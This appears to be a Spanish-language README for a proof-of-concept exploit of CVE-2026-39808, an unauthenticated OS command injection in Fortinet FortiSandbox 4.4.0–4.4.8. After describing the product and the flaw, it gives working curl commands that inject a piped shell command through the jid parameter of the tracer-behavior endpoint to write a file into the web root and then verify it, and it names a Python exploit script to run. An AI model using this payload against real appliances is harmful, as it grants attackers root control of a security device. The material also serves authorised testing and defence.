
Fortinet FortiSandbox 4.4.0-4.4.8 - Inyección de comandos del SO a través del Endpoint tracer-behavior
Fortinet FortiSandbox 4.4.0-4.4.8 - Inyección de comandos del SO a través del endpoint tracer-behavior
Fortinet FortiSandbox es una solución avanzada de protección contra amenazas que crea entornos aislados para analizar archivos sospechosos, URL y tráfico de red en busca de comportamiento malicioso. Utiliza una combinación de análisis estático, análisis dinámico, aprendizaje automático impulsado por IA e inteligencia de amenazas de FortiGuard para detectar amenazas de día cero, malware evasivo, ransomware y ataques dirigidos que evaden las defensas tradicionales basadas en firmas. Las empresas deberían implementar FortiSandbox para protegerse contra amenazas emergentes—particularmente malware desconocido y amenazas persistentes avanzadas (APT); detonando automáticamente contenido sospechoso en un entorno seguro y aislado antes de que llegue a los sistemas de producción. Se integra con la Fortinet Security Fabric y se puede implementar como dispositivo físico, máquina virtual, servicio en la nube, o solución contenerizada para adaptarse a diversas arquitecturas de red.
CVE-2026-39808 es una vulnerabilidad crítica de inyección de comandos del SO que afecta a las versiones 4.4.0 a 4.4.8 de FortiSandbox. El fallo se origina en una neutralización incorrecta de elementos especiales en la entrada controlada por el usuario antes de que se utilice en la construcción de comandos del SO (CWE-78), afectando específicamente a un endpoint API no especificado. Un atacante no autenticado puede explotar esta vulnerabilidad enviando solicitudes HTTP especialmente diseñadas para ejecutar comandos arbitrarios del sistema operativo con privilegios de root en el sistema subyacente. La explotación exitosa otorga al atacante control total sobre el dispositivo FortiSandbox, permitiéndole acceder a muestras de malware analizadas, extraer datos de configuración sensibles, pivotar a segmentos de red conectados, o usar el dispositivo comprometido como punto de apoyo para un movimiento lateral adicional dentro del entorno empresarial. Esta vulnerabilidad se está explotando activamente en la naturaleza.
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
"http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
python CVE-2026-39808-X7.py
Este repositorio y su contenido se proporcionan estrictamente para investigación de seguridad legítima, pruebas de penetración autorizadas, estudio educativo y fines defensivos. Al acceder o utilizar este material, usted reconoce la plena responsabilidad de garantizar que sus actividades cumplan con todas las leyes aplicables y que haya obtenido la autorización adecuada antes de probar o aplicar estas técnicas contra cualquier sistema que no sea de su propiedad.
Los autores y mantenedores de este proyecto no asumen ninguna responsabilidad por daños, consecuencias legales o uso indebido resultante de la aplicación de esta información. Cualquier uso para acceso no autorizado, actividad maliciosa o fines ilegales está expresamente prohibido y no cuenta con soporte.
Úselo de manera responsable. Manténgase dentro de la ley. Pruebe solo lo que posee o para lo que tenga permiso explícito por escrito.
SCT-PL